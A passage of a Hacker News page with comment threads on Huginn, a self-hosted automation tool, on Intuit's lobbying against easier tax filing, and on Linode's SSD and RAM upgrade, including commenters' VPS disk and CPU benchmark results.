IMO, CloudFlare is lame. Kudos to this guy for reminding me just how much so.
23
bitsteak 6 days ago 1 reply      
Why did anyone need this challenge in the first place? Couldn't someone have just ASKED a good exploit developer what they would do and what the impact is? No, I guess we're all up for wasting people's time and creating potential false negatives.
6
Huginn: Like Yahoo Pipes plus IFTTT on your server github.com
484 points by ColinWright  3 days ago   94 comments top 23
1
malanj 3 days ago 2 replies      
This looks really awesome for managing an office. We're currently automating things using Google scripts and other custom glue to do things like order food, get feedback on lunch and mail people weekly digests activities. Sounds like this could be a great solution for this.
2
albertsun 3 days ago 2 replies      
The best part of Huginn is being able to self-host and write any arbitrary agents you want.
3
hyp0 3 days ago 1 reply      
I always liked the Yahoo Pipes concept... but it didn't seem to take off... and I personally found it too limited for everything I tried to do with it. Perhaps it's just another case of the old "visual programming language" is harder than it looks.

I hope Huginn does better. I like their copywriting "You always know who has your data. You do."

4
danso 3 days ago 0 replies      
Also relevant: How the New York Times interactive team uses Huginn

https://source.opennews.org/en-US/articles/open-source-bot-f...

> Most prominently, we used it during our Olympics coverage to monitor the results of the API we built and let us know if the data ingestion pipeline ever grew stale. To do that, we set up a pipeline

5
yukichan 3 days ago 0 replies      
Zapier is also good with lots of integrations, but it's a little pricey. Yet if you calculate what your time is worth and include the amount spent on making this work plus customizations, it's probably less. Depends on if Zapier can do what you want.
6
c0nsumer 3 days ago 1 reply      
This is a really frustrating name. Hugin is already used for panoramic photo stitching software: http://hugin.sourceforge.net/

This just has another N bolted on to the end and does something completely different.

7
fasteddie31003 3 days ago 3 replies      
I am working on a similar project called Taskflow.io that is aimed at more backend business oriented tasks. It can do similar things through an interface flowchart editors where you make the actual flowchart that gets executed. I would still consider it a public beta. I would love your feedback.
8
FroshKiller 3 days ago 1 reply      
One of the developers posted about this recently: https://news.ycombinator.com/item?id=7582316
9
thomasfl 3 days ago 1 reply      
Will this run on a standard heroku stack? The wiki says it will run on OpenShift and CloudFoundry. https://github.com/cantino/huginn/wiki
10
alxndr 2 days ago 1 reply      
Anyone know why this project encourages using a private fork to do contributing development?

> "Make a public fork of Huginn. [...] Make a private, empty GitHub repository called huginn-private. Duplicate your public fork into your new private repository[. ...] Checkout your new private repository. Add your Huginn public fork as a remote to your new private repository[. ...] When you want to contribute patches, do a remote push from your private repository to your public fork of the relevant commits, then make a pull request to this repository."

11
kzahel 3 days ago 4 replies      
Does this have a companion android/iOS app to upload location data? I really like the idea of self hosting something like this.
12
jayxie 3 days ago 0 replies      
Exciting stuff, it would be amazing to build an AI layer on top of this that mines your browsing habits (depending on your paranoia settings) and automatically generates agents based on your interests.
13
platz 3 days ago 3 replies      
Excluding the UI, I wonder if storm is a more robust, if more complex, option to do the same types of things: http://storm.incubator.apache.org/
14
weavie 3 days ago 0 replies      
This sounds like an excellent project to make use of my raspberry pi.
15
rcyeager 3 days ago 1 reply      
Another Pipes+IFTTT tool: https://wewiredweb.com
16
okhan 2 days ago 0 replies      
I was just building exactly this, only worse. Looks really great.
17
zwentz 3 days ago 0 replies      
This would be very cool for automating parts of AWS. Inclement weather coming? Or an earthquake? Start spooling up servers in another region.
18
SloughFeg 3 days ago 1 reply      
Is there an online sandbox anywhere to check it out? A project like this simply calls out for there to be a live demo.
19
kirk21 3 days ago 1 reply      
Where can you get an invite code? http://snag.gy/xh6uk.jpg
20
fujipadam 1 day ago 0 replies      
This is awesome but is there a tool like this in php? I am looking for an easy visual scraper
21
notastartup 3 days ago 1 reply      
what would be great is if each agent was somehow able to obtain its own ip address.
22
psaintla 3 days ago 2 replies      
Am I missing something or is this just another rules engine?
23
dfc 3 days ago 1 reply      
You are doing it wrong. Colin's style is more like this:

  Previous discussion of the project:
  https://news.ycombinator.com/item?id=7582316 # Yesterday
  https://news.ycombinator.com/item?id=5377651

7
TurboTax Maker Intuit Funnels Millions to Lobby Against Easier Tax Returns techcrunch.com
443 points by acjohnson55  2 days ago   180 comments top 42
1
bpeebles 2 days ago 4 replies      
Virginia's Department of Taxation used to have a pretty decent online tax website. It was shut down because of lobbying such as this. There was a year when no free online filing so I took the extra effort to do a paper return that year. Even FreeFilableForms are run by the Free File Alliance which is part of the group that lobbies against the IRS and state taxation departments from doing their own filing websites for personal profit. So they make sure that their own free filing options are just good enough to be barely acceptable while making their paid (for filers with income over ~$58k) options seem much more attractive.

Between this and intentional complexity of the tax system that hinders making the IRS more efficient and hides true tax rates that corporations and higher income people... I dunno, it's one of the blacker marks against America in this aspect of policy.

But I've without doubt decided I'll try as hard as possible to never, ever pay a company like that to file tax returns.

2
eli 2 days ago 1 reply      
This TechCrunch post is a rehash of last year's ProPublica investigation: http://www.propublica.org/article/how-the-maker-of-turbotax-...

Might as well at least mention this year's revelation, which is that they fund fake Grassroots campaigns against tax reform: http://www.propublica.org/article/turbotax-maker-linked-to-g...

3
nixy 1 day ago 5 replies      
I lived in the US last year and just finished my taxes. It was unbelievably complicated and confusing, even using Turbo Tax. Never seen the likes of it.

This is how I do my tax return in Sweden:

1. Receive equivalent of W2, but all returns are already pre-calculated since the Swedish IRS knows all it needs to know to be able to prepare my returns.

2. If I'm happy with my W2 and pre-calculated returns, I simply send a text message with a PIN code to submit my returns.

3. If I'm not happy with my pre-calculated returns, I make the necessary changes in a simple form and mail it back to the IRS. Most people never do this.

4
bbanyc 2 days ago 2 replies      
Many foreigners are puzzled about why we Americans complain so much about our taxes, when they aren't particularly high by global standards. A major reason is that our taxes are particularly intrusive and annoying by global standards.

This also goes for consumption taxes - a 9% sales tax added at the register feels more intrusive than a 20% VAT included in the price tag, even though the VAT is much higher.

5
ryanobjc 2 days ago 4 replies      
It's really too bad, their basic product - turbo tax free file uses the 1040 EZ form and can be confusing.

My gf who is a student was told by turbotax she owed over $300, after doing it on paper, the old fashioned way, the tax liability was 0. Why? The tuition deduction didn't apply on the EZ version of the form.

Ultimately turbo tax takes a conservative, strict and rigid approach to taxes, but as anyone knows this isn't the reality of doing taxes. For anyone with a moderately complex return, I think it's better to hire a tax professional, then at least you'll LEARN something for your money (which can be about the same amount!).

6
SeanKilleen 2 days ago 5 replies      
This is probably better left for "Idea Sunday", but I keep coming back to the fact that:

* We have languages for defining business processes & workflows (e.g. BPMN/BPML);

* We have open-source workflow engines (such as Activiti in Java and others all over the language spectrum) that utilize BPMN and terms;

* We have open-source ways of maintaining changes to these things over time.

I know it would be a monumental task, but why not start an open-source org to tackle Tax visibility at Federal and State levels?

With enough civic-minded hackers and accountants (both of which I believe exist), we could begin the process of transcribing the tax code into an interchange format. Then as we begin to see the updates each year, we can track the changes via source control.

Does anybody know if efforts like this have been undertaken anywhere else? Otherwise, I may have found my passion project.

Furthermore, does anyone know anything about the process by which Intuit makes this happen? They clearly have workflows and inputs into them; they had to get there somehow. I'd be interested in any/all knowledge that could be opened up on this.

7
brianstorms 1 day ago 2 replies      
This should not come as any surprise, really. This is what mature companies do once they achieve any level of monopoly that could be threatened with new legislation that benefits the public (and other businesses) but could hurt the monopoly. This is what the auto dealers are doing: after enjoying decades of control and a cozy relationship with legislators, they're threatened by upstarts like Tesla. But then at some point, if and when Tesla wins, it'll have to deploy its own army of lobbyists to keep the new status quo going.

It is what every web and mobile startup, it seems to me, deep down aims for: a monopoly, an unfair advantage. It is what, between the lines, you are taught at YC and what every VC expects of the "unicorn" portfolio companies that strike it rich. Fight to get to #1, wipe out the competition, reap the winnings, and, oh yeah, strike down any threats from, you know, up-and-coming competitors. So it goes.

It's business. It's ugly. If you don't like it, why are you doing a startup? If your startup is wildly successful and IPO's and turns into a giant, you don't think you will have to pay a lot of lobbyists to control the legislators?

8
japhyr 1 day ago 1 reply      
I don't mind paying taxes. But I was definitely cursing this last week as I spent hours filling out forms to calculate numbers that the IRS has already calculated on its own.

I want a letter in the mail saying, "If you don't fill out any paperwork, this is the amount we will return to you/ bill you for. If you get a different number, send in your paperwork by 4/15."

Doing taxes is a ridiculous waste of most people's time.

9
Oculus 2 days ago 1 reply      
This makes me wonder how much of the government's incompetence is from companies lobbying for the government to keep its old ways.
10
CoachRufus87 2 days ago 0 replies      
Bigger story: our government can be bought for the low price of $11.5 million.
11
cpwright 1 day ago 0 replies      
The current software is also just bad. I used to use TurboTax, but now I'm using TaxCut. TaxCut has the following issues, which are really just stupid at this point:

- Even though it could import last year's return, it needs me to tell it how much of my 2012 tax refund from the state should be counted as 2013 income. I have to recalculate my last year's tax liability based on a lower deduction (because AMT may or may not erase the deduction anyway).

- It tells you that you have a slightly increased audit risk for one of about 5 different reasons, that are mutually exclusive and only one of them applies to my return.

This is the stuff that a computer can do very well, but is tedious and error-prone for me.

Moreover, the last time I used TurboTax and I'm sure this is true with TaxCut still, it wants me to decide if I want to file jointly or separately. Why in the world should I have to make that decision or do the returns twice. The software should be intelligent enough to do the calculations both ways, and present the better answer, with the option to overrule it.

If the government was making this software you could see it being this bad, but these companies are supposedly competing to do it; but it is still awful. Arguably, this is because the tax system is awful, but most of this is just coasting.

I also would expect that the state software wouldn't be very good (at least for unpopulous states), but most of my issues are with the federal return.

12
clogston 2 days ago 6 replies      
Disclaimer: I used to work for Intuit/TurboTax and am now building a product in the same space. On topic: They rightly get beat up for this, and get beat up for their lack of pricing transparency, but somehow manage to always receive a pass on the software itself. IMHO it's pretty atrocious... Sure, the math is almost always right but the math is a commodity. The experience itself is overly-verbose and littered with repeat questions, confusing questions, open-ended questions.

I don't know anyone who genuinely enjoys using TurboTax. I'm surprised there isn't more legitimate competition in this space.

13
onislandtime 2 days ago 1 reply      
So pathetic to have to even have to debate the benefit of IRS providing a website to file taxes. The free filing for income lower than $58K is a scam. If you have a 1099 for $1000 or capital gains of $500 you are out of luck, it is impossible to know what they will charge until after you enter the data. That's what these assholes call innovation. The only explanation is that Intuit is influencing members of congress with money, that's a crime. There is no possible argument to justify forcing 100 million people to waste time on something that should be trivial for most people.
14
sirdogealot 2 days ago 0 replies      
Recently sitting down and manually preparing my taxes for the 9th year in a row now... I am not surprised.

This type of tax-code-manipulation must certainly have been happening since the dawn of time. That, or it was written to confuse the public on purpose.

Finding, reading, learning and understanding the tax code is no mean feat for a layman that was told nothing of it in school (none of us Canadians were taught taxes in public school). And this is coming from a relatively smart person who willingly reads cryptography papers and learns new programming languages for fun.

How much more difficult does TurboTax propose that the IRS make filing? Should we get individually filed returns notarized by our deceased relatives as well?

It usually takes me about 12-24 straight hours of work, and this is for a simple sole-proprietorship that just tallies up income and deducts expenses.

I manage to get it done properly and on time every year, but realizing so many shortcuts along the way that "they" could be making for us yet fail to year after year... it's really quite infuriating.

That, and the fact that I have to do the work to figure out how much I owe them. :/

I am proud to have completed my taxes myself and will strongly urge everybody I know not to vote for TurboTax with their wallets and why.

15
todd8 1 day ago 1 reply      
The crazy complexity of the US tax system is worse than it appears. There is a non-linear increase in complexity as one goes up the income scale. Have a few investments? More complexity. Real estate investments? More complexity. Starting a company? Even more complexity. Reasonably diversified individuals that have perhaps sold a company or two can expect a rough time.

One reason the complex system is tolerated is that the people it really hurts are very few. A friend of mine has never been audited and does nothing shady but spends roughly $30,000 on tax accountants every year preparing his returns because they are so complex. Fortunately for the rest of us, we just have to waste an inordinate amount of time with Turbo Tax.

16
yxhuvud 1 day ago 0 replies      
Swedish procedure (unless you have slightly more complicated stuff like stock ownership):

Go to tax agency home page and login there.

Go to the form for normal taxes.

All values are prefilled. Check two boxes (if you want to register two very common deductions).

Save and back up one step.

Submit tax declaration by looking through all numbers again and clicking submit.

17
tn13 2 days ago 0 replies      
I filed my returns once with turbo tax since then I have been using that form as a reference to file my other returns myself!
18
willtheperson 1 day ago 1 reply      
While doing my taxes I was wondering why there isn't a startup in this space.

Turbotax:

- Has a terrible UX/UI

- It has to update itself with a 100mb payload every time you open it from Jan 1 - Apr 15

- Doesn't actually advise you how to plan for your taxes. It's reactive to what you did.

- Uses shady pricing and lots of versions to get you to spend more instead of just being straightforward.

- Works hard to make you dependent on them

When you hear about the rich only paying 10%, 15% or whatever low bracket; they did it by putting their money in the right places and sometimes investing or spending it at the right time.

Where is the startup that is basically my accountant without the cost? Can we really not programmatically understand tax code and financial strategy?

19
arebop 2 days ago 0 replies      
I've been wondering if there's a PAC I could contribute to that would offset my Intuit funding.
20
mleonhard 2 days ago 0 replies      
According to Intuit's 2013 Annual Report page 41 [1] , they had $1.5B in Consumer Tax product revenue, which is primarily derived from TurboTax Online. That is 35% of their $4.2B total revenue in 2013.

They're creating a lot of ill-will for 35% of their business.

[1] http://investors.intuit.com/files/Intuit%20FY13%20Form%2010-...

21
nness 1 day ago 0 replies      
As an interesting aside, Australia's taxation department, the Australian Taxation Office, provides a completely free piece of software each year called e-tax (http://www.ato.gov.au/Individuals/Lodging-your-tax-return/E-...).

It walks you through filling out your tax lodgement step-by-step and even calculates your expected return. It's not the nicest piece of software, but after having read this article, I am greatly appreciative that it exists at all.

22
ecolner 1 day ago 0 replies      
* Not trying to piss off PG. I honestly don't know the rules about gathering supporters on HN, but this is in the spirit of the community I hope *

If anybody would like to use their skills to fix this issue with me (ex Intuit TurboTax engineer) please hop over to this Ask HN and send me a message (email on thread). Also check the website for a bit more context: http://taxcompactor.com

It's a pretty big project, but it's very doable by a small team from this community. Tax preparation is fundamentally a software engineering problem, which is convenient.

Need everything from testing to project management with myself floating between roles. Remote is welcome - I'm in California. We'll use Basecamp, Github, Jira, Skype? to work - productivity suggestions welcome of course. True collaboration and fair equity.

https://news.ycombinator.com/item?id=7599443

There are a few really great folks that have already reached out. Email me for details and we'll go from there. I'd love to hear from you.

23
wiradikusuma 1 day ago 1 reply      
While we're on this topic, if you're a US citizen and you have a company, I would like to ask:

1. If I incorporated a C-Corp on June 2013, and I told my lawyer I want my fiscal year to end by March 31, when is the deadline to file the tax? Is it still April 15? (I hope not, I haven't filed)

2. Is there any free tax filing solution for business? Considering my company has zero revenue (it doesn't even run, but that's another story).

FYI, I'm not a US citizen.

24
zobzu 1 day ago 1 reply      
in my experience...

in germany filing taxes took me about 5min.. that's really because you need to go get a paper and give it to your company. It's otherwise more like 0 minutes since there's barely anything to do (which is.. logical, as it's pointed out, they already have the data).

in the US, after hours and hours of reading and trying to do it myself, it's still hell. using turbotax means it's going to take 30min instead of a month; all that for "$30 a year" or close to that.

That's certainly fucked up.

25
grandinj 1 day ago 0 replies      
Even "third-world" countries like South Africa have e-filing for taxes....
26
gamed 1 day ago 0 replies      
This is a typical example of rent seeking behaviour. Companies spending money on lobbying without creating wealth. Unfortunately tax is one of the core functions of government and will always be vulnerable to this sort of manipulation of the political process.
27
nathan_f77 2 days ago 3 replies      
Just moved to the US last year, and used Turbo Tax to file my tax returns. It was alright, but in New Zealand, we don't generally have to jump through all these hoops.

I guess it would be nice if there were a free alternative to TurboTax, but at the same time, I kind of don't really care, so I'm happy to let them get away with whatever they're doing. I know Lobbying isn't illegal in the U.S., and I don't think it's all that immoral either.

28
001sky 2 days ago 2 replies      
Intuit has spent $11.5 million lobbying the federal government...

$10MM seems like a pittance. That's like what...2 minutes of superbowl ads? Can you really buy legislation for this cheap?

29
novalis78 1 day ago 0 replies      
Tax procedure on Mars: Go to your government's website and send them some Marscoin on the kickstarter project of the week or equivalent tipping addresses. Or have some AI distribute a percentage of your funds on your behalf based on some predefined rules.
30
thrillgore 1 day ago 0 replies      
Well color me shocked. A company using lobbying to protect its sources of revenue.
31
harywilke 1 day ago 0 replies      
i'm surprised how many people do not use accountants to prepare their taxes. i tried turbotax or one of its ilk my first year out of college. it showed me owing 7k. after freaking out i got in contact w/ my brother's accountant. i ended up getting a refund of 700. it's not my job to know the ins and outs of the tax code or to keep up on what has changed since last year's filings. hire an expert.
32
AznHisoka 1 day ago 1 reply      
More reason to hate Turbotax. Their commercials are ridiculous too - NO, doing my taxes is not a way to summarize my year achievements...idiots
33
mfisher87 1 day ago 0 replies      
I don't understand. I asked them specifically not to do this in my survey after completing my return.
34
sseveran 1 day ago 0 replies      
And anyone is surprised because...?
35
obeid 1 day ago 0 replies      
WHAT? a corporation that capitalized on the government's incompetence, is doing everything in their power to make sure things stay the same.

No come on you guys, April first was two weeks ago.

36
joshdance 1 day ago 0 replies      
As the witch from Princess Bride would say, "Booooooooo! BOOOOOOO!".
37
christemmer 2 days ago 1 reply      
How can lobbying such as this not be seen as corruption, but as a perfectly legal (but most importantly "right") thing to do?
38
whoismua 1 day ago 0 replies      
Before this is settled, the tax code should be made simpler with black or white options. A tax preparer saved me a few thousand dollars once by asking the right questions (school tuition). The same for my corp CPA.

The "free" tax return would serve who exactly? What if the government "forgot" to mention a few tax breaks? Maybe the government should offer free tax returns for the plain and simple ones or for those with very low incomes. Paying $50 to $100 to do your taxes when you pay, say $10K in taxes, isn't much.

US taxes are very low compared to Sweden and most EU countries.

39
obeid 1 day ago 0 replies      
WHAT? a corporation that capitalized on the government's incompetence is doing everything in their power to make sure things stay the same.

No come on you guys, April first was two weeks ago.

40
snowwrestler 2 days ago 2 replies      
I question the idea that the government could build better tax prep software than Intuit or other private companies. I don't think the Feds are known these days for performant, efficient, easy-to-use large scale consumer web applications. At a minimum I think discussion along those lines should wait until federal IT procurement is reformed.

It's also worth noting that the article is not talking about the actual complexity of the tax code itself. As far as I know, Intuit is lobbying on the subject of tax preparation technologies, not lobbying against tax simplification in general. (As some comments seemed to imply.)

41
sunsu 2 days ago 1 reply      
If you were running Intuit, would you do anything differently? The TurboTax product is built on the fact that the Tax code is complicated. Of course they're going to lobby against tax reform.
42
webwielder 2 days ago 4 replies      
I used to boycott TurboTax because of this. But then I realized that Intuit is just playing the game. Why wouldn't they do everything they can to sustain their business (well, a sense of moral decency, I guess, but that's a big ask)?

The real root of the problem is of course our broken political process.

8
The New Linode Cloud: SSDs, Double RAM and much more linode.com
441 points by qmr  14 hours ago   222 comments top 48
1
madsushi 12 hours ago 4 replies      
Why do I pay Linode $20/month instead of paying DO $5/month(1)?

Because Linode treats their servers like kittens (upgrades, addons/options, support), and DO treats their servers like cattle. There's nothing wrong with the cattle model of managing servers. But I'm not using Chef or Puppet, I just have one server that I use to put stuff up on the internet and host a few services. And Linode treats that one solitary server better than any other VPS host in the world.

(1) I do have one DO box as a simple secondary DNS server, for provider redundancy

2
kyrra 13 hours ago 6 replies      
I forgot to benchmark the disk before I upgraded but here are some simple disk benchmarks on an upgraded linode (the $20 plan, now with SSD)

  $ dd bs=1M count=1024 if=/dev/zero of=test conv=fdatasync
  1024+0 records in
  1024+0 records out
  1073741824 bytes (1.1 GB) copied, 1.31593 s, 816 MB/s
  $ hdparm -tT /dev/xvda
  /dev/xvda:
   Timing cached reads:   19872 MB in  1.98 seconds = 10020.63 MB/sec
   Timing buffered disk reads: 2558 MB in  3.00 seconds = 852.57 MB/sec
Upgraded cpuinfo model: Intel(R) Xeon(R) CPU E5-2680 v2 @ 2.80GHz

Old cpuinfo model: Intel(R) Xeon(R) CPU L5520 @ 2.27GHz

CPUs compared: http://ark.intel.com/compare/75277,40201

3
nivla 13 hours ago 3 replies      
Awesome News. Competition really pushes companies to please their customers. Ever since Digital Ocean became the new hip, Linode has been pushing harder. My experience with them has been mixed. Forgiving their previous mishaps and the feeling that the level of Customer Service has gone down, they have been decent year long. I wouldn't mind recommending them.

[Edit: Removed the bit about DigitalOcean Plans. If you have Ghostery running, it apparently takes out the html block listing different plans]

4
rjknight 13 hours ago 9 replies      
It looks like Linode are still leaving the "incredibly cheap tiny box" market to DO. Linode's cheapest option is $20/month, which makes it slightly less useful for the kind of "so cheap you don't even think about it" boxes that DO provide.
5
pavanky 11 hours ago 2 replies      
I wish Linode (or anyone else other than Amazon) provides a reasonable Plan[1] with GPUs on them.

[1]: Amazon charges $2 an hour, that's about $1500 a month.

6
conorh 12 hours ago 2 replies      
Benchmarking using wrk the smallest linode (1024 now 2048) serving a page from an untuned Rails application using nginx/passenger getting almost no other traffic. Hard to compare of course given the various other factors, but produced slightly lower performance after the upgrade. Serving a page from nginx directly (no Rails) had no appreciable difference in performance, I guess the Rails web serving is more vCPU bound?

Before Upgrade:

  Running 30s test @ http://...
    5 threads and 20 connections
    Thread Stats   Avg      Stdev     Max   +/- Stdev
      Latency   308.91ms  135.01ms 985.82ms   80.00%
      Req/Sec    14.15      4.61    24.00     66.36%
    2206 requests in 30.00s, 28.51MB read
  Requests/sec:     73.53
  Transfer/sec:      0.95MB
After Upgrade:

  Running 30s test @ http://..
    5 threads and 20 connections
    Thread Stats   Avg      Stdev     Max   +/- Stdev
      Latency   321.74ms  102.45ms 957.74ms   87.32%
      Req/Sec    12.02      2.18    17.00     80.75%
    1858 requests in 30.01s, 24.03MB read
  Requests/sec:     61.92
  Transfer/sec:    819.98KB

7
jebblue 34 minutes ago 0 replies      
I was looking into alternatives but now I'll stick with them, I can't find another cloud provider whose stuff works so well.

edit: I just finished the migration, my disk speed test is through the roof, free ram is phenomenal!

8
endijs 13 hours ago 3 replies      
Most interesting part in this great upgrade is that they went from 8CPU setup to 2CPU setup. But yeah - 2x more RAM, SSDs will guarantee that I'm not going to switch anytime soon. Sadly I need to wait a week until this will be available in London.
9
raverbashing 13 hours ago 0 replies      
Congratulation on Linode

I stopped being a customer since migrating to DO but my needs were really small

But I think their strategy of keeping the price and increasing capabilities are good. Between $5 and $20 is a "big" difference for one person (still, it's a day's lunch), for a company it's nothing.

However, I would definitely go to Linode for CPU/IO intensive tasks. Amazon sucks at these (more benchmarks between the providers are of course welcome)

10
SCdF 7 hours ago 1 reply      
> Linodes are now SSD. This is not a hybrid solution - it's fully native SSD servers using battery-backed hardware RAID. No spinning rust! And, no consumer SSDs either - we're using only reliable, insanely fast, datacenter-grade SSDs that won't slow down over time. These suckers are not cheap.

http://techreport.com/review/26058/the-ssd-endurance-experim...

Not to slam what Linode is doing here, and I'm sure there are probably lots of great reasons to buy datacentre-grade SSDs, but just thought I'd point out that slowing down over time (or data integrity issues) are not really consumer-grade problems any more :-)

11
giulianob 14 hours ago 0 replies      
Holy crap this is awesome. Good job guys at Linode. I said I would switch if the prices dropped about 25% because RAM was pricey.... So now I have to switch.
12
relaxatorium 13 hours ago 2 replies      
This seems pretty fantastic, I am excited to upgrade and think the SSD storage is going to be really helpful for improving the performance of my applications hosted there.

That said, I am not an expert on CPU virtualization but I did notice that the new plans are differently phrased than the old ones here. The old plans all talked about 8 CPU cores with various 1x, 2x priority levels (https://blog.linode.com/2013/04/09/linode-nextgen-ram-upgrad... for examples), while the new plans all talk about 1, 2, etc. core counts.

Could anyone with more expertise here tell me whether this is a sneaky reduction in CPU power for the lower tiered plans, or just a simpler way of saying the same thing as the old plans?

13
__xtrimsky 9 hours ago 3 replies      
I still prefer OVH.com
http://www.ovh.com/us/vps/vps-classic.xml

for $7 you get:
2 cores
2GB RAM

for 10$ you get:
3 cores
4GB RAM

They don't have SSD, but SSD doesn't do everything, I prefer more ram.

EDIT: If some of you don't know OVH, it's because it's new in America, but it's not some cheap company, it's a European company that is very successful there. And just recently created a datacenter in North America. (I used to live in France, and have known them for some years).

14
harrystone 11 hours ago 0 replies      
I would love to see them still keep all those old disks and sell me some huge, cheap, and slow storage on them.
15
munger 12 hours ago 1 reply      
Rackspace cloud customer here - These Linode upgrades are very tempting to entice me to switch.

I get I might not be their target market (small business with about $1000/month on IaaS spending) but there are a couple things preventing me from doing so:

1) $10/month size suitable for a dev instance.

2) Some kind of scalable file storage solution with CDN integration like RS CloudFiles/Akamai or AWS S3/Cloudfront or block storage to attach to an individual server.

I guess you get what you pay for infrastructure components and flexibility AWS > RS > Linode > DO which roughly matches the price point.

16
ihowlatthemoon 11 hours ago 1 reply      
VPSBench result:

Before

-------

  CPU model:  Intel(R) Xeon(R) CPU           L5520  @ 2.27GHz
  Number of cores: 8
  CPU frequency:  2266.788 MHz
  Total amount of RAM: 988 MB
  Total amount of swap: 255 MB
  System uptime:   8 days, 12:03,
  I/O speed:  69.9 MB/s
  Bzip 25MB: 8.96s
  Download 100MB file: 47.2MB/s
After

------

  CPU model:  Intel(R) Xeon(R) CPU E5-2680 v2 @ 2.80GHz
  Number of cores: 2
  CPU frequency:  2800.086 MHz
  Total amount of RAM: 1993 MB
  Total amount of swap: 255 MB
  System uptime:   2 min,
  I/O speed:  638 MB/s
  Bzip 25MB: 5.10s
  Download 100MB file: 146MB/s
Test: https://github.com/mgutz/vpsbench

17
orthecreedence 12 hours ago 2 replies      
Bummer, they're taking away 8 cores for the cheap plans and replacing it with 2. Does anyone know if the new processors will offset this difference? I don't know the specs of the processors.

Linode's announcements usually come in triples...I'm excited for number three. Let's hope it's some kind of cheap storage service.

18
rdl 9 hours ago 0 replies      
Semi-related: does anyone know of any good (but still fairly cheap) providers doing Atom C2750/C2758 servers yet?
19
vidyesh 12 hours ago 1 reply      
So this makes Linode practically on par with DO's $20 plan. Up till now $20 plan at DO was better now it's just the choice of the brand.

But here is one thing that DO provides and I think Linode too should, you get the choice to spin up a $5 instance anytime in your account for any small project or a test instance which you cannot on Linode.

20
davexunit 13 hours ago 4 replies      
Cool news, but their website now has the same lame design as DigitalOcean. I liked the old site layout better.
21
mwexler 13 hours ago 1 reply      
There's similar and then there's alike. I guess it makes comparison easy, but imitation certainly must be the sincerest form of flattery:

Compare the look and feel of https://www.linode.com/pricing/ and https://www.digitalocean.com/pricing/

22
corford 7 hours ago 0 replies      
Big shame the new $20 plan now only offers 2 cores versus 8 with the current plan. For my workloads, I don't need 2GB RAM or SSD disks, I just need the cores :(
23
__xtrimsky 8 hours ago 0 replies      
Could someone please explain what improvements can we get from SSD for web applications ?

I know it would read files faster, but in most cases reading a couple of PHP files is not such a big improvement.

My guess would be maybe databases ? Read time improvement for MySQL ?

24
ausjke 9 hours ago 0 replies      
This is great indeed. I'm happy Linode did this. I ran below command 10 times and used the average below:

  dd bs=1M count=1024 if=/dev/zero of=test conv=fdatasync

Linode: 1073741824 bytes (1.1 GB) copied, 1.09063 s, 985 MB/s
D.O: 1073741824 bytes (1.1 GB) copied, 3.23998 s, 331 MB/s

  dd if=/dev/zero of=test bs=512 count=1500 oflag=dsync

Linode: 768000 bytes (768 kB) copied, 0.478633 s, 1.6 MB/s
D.O: 768000 bytes (768 kB) copied, 1.01716 s, 755 kB/s

25
funkyy 5 hours ago 0 replies      
I would love to see Linode going to large HDD drives option for storage as well. I am dying to find really inexpensive cloud provider with cheap data space (SATA is fine), reasonable bandwidth but low cpu and ram and Linode style support/caring. Give server with ~500 GB hard drive, 2 TB outgoing transfer, 1 core and 1 GB ram for ~$20-30 and I am all yours.
26
extesy 13 hours ago 2 replies      
So now they match DigitalOcean prices but offer slightly more SSD space for each plan. I wonder what DO answer to this would be. They haven't changed their pricing for quite a while.
27
filmgirlcw 10 hours ago 1 reply      
Shall we call this the DigitalOcean effect?
28
jevinskie 13 hours ago 0 replies      
I resized a 1024 instance to 2048 last night and it looks like it is already running on the new processors (from /proc/cpuinfo): model name: Intel(R) Xeon(R) CPU E5-2680 v2 @ 2.80GHz

Should I upgrade? Do I want 2 x RAM for 1/2 vCPUs? =)

29
jrockway 10 hours ago 1 reply      
A nice reward for those of us who have been using Linode from before they even had x86_64 images.
30
bfrog 13 hours ago 3 replies      
I'm actually a little unhappy, it looks like they reduced the CPU count for my $20/mo instance. At this point there's basically no reason to stay with them now.
31
level09 12 hours ago 0 replies      
I would probably move back from Digital Ocean if they allow a 10$/mo plan.

I know that's not a big price difference, but some website really don't need a lot of resources. they work well on D.O's 5$ server, and I have really a lot of them.

32
h4pless 13 hours ago 2 replies      
I notice that Linode talked a good bit about their bandwidth and included outbound bandwidth in their pricing model which DO does not. I wonder if DO has a similar model or if transfer capacity the only thing you have control over.
33
kijin 3 hours ago 0 replies      
About a week ago, I wrote a comment in another Linode-related thread asking how the new usage patterns that hourly billing encourages might affect CPU contention. At the time, I received 11 upvotes but no replies. Apparently, quite a few people were interested in my question but had no useful conjectures to share.

https://news.ycombinator.com/item?id=7564764

Now it's obvious what Linode's answer to that question is: Lower "burstable" CPU for lower plans.

The $20 plan used to be able to burst to 8 cores for short periods, but now it only has access to 2 vcores. The "guaranteed" processing power is probably higher with the newer CPUs, but at the expense of short-term burst performance.

Another minor detail that I find interesting is that the transfer cap for the $20 plan has been increased to 3TB, whereas the $40 plan still gets 4TB. Apart from the transfer cap plateau-ing at the extreme high end, this is the first time that Linode has broken its 11-year-old policy of "pay X times as much money, get X times as much RAM/disk/transfer".

34
Kudos 8 hours ago 0 replies      
Ubuntu 14.04 LTS is now available on Linode too.
35
jaequery 13 hours ago 0 replies      
im really impressed by their new CPU specs. from experience those aren't cheap and it's possibly the fastest CPU out in the market. combined with the SSDs, it may be that Linode currently is the fastest of any cloud hosting right now.
36
shiloa 10 hours ago 1 reply      
I have mixed feelings about this. We're in the process of moving from Linode to Rackspace but haven't flicked the switch just yet - was planning to this weekend.

Our Linode server (16 GB plan) has been performing terrible lately wrt I/O (compared to, say, a Macbook Pro running the same computations), and we decided we've had enough. I guess we'll have to compare the two after the upgrade and decide.

37
jaequery 13 hours ago 1 reply      
DO's biggest problem is their lack of "zero-downtime snapshot backup and upgrading". i've not used Linode but anyone know if theirs is any different?
38
nilved 8 hours ago 2 replies      
Linode's recent upgrades are awesome, but people are very quick to forget the period where they were being hacked left and right and didn't communicate with their customers until a defensive blog post weeks after the fact. No matter how good the servers may be, Linode should be a non-starter for anybody who cares about the security of their droplet; and, if you don't, why would you pay Linode's premium fee?
39
beedogs 10 hours ago 0 replies      
This is nice to see. SSD has gotten ridiculously cheap lately.
40
Justen 13 hours ago 1 reply      
Higher specs sound really nice, but on HN I see people commenting on the ease of DO's admin tools. How does Linode's compare?
41
jdprgm 9 hours ago 0 replies      
This is really a fantastic upgrade. I've been hosting with Linode for a few months now and been very happy with them. I run a relatively transfer intense SaaS app and a 50% transfer increase makes quite an improvement.
42
ff_ 12 hours ago 0 replies      
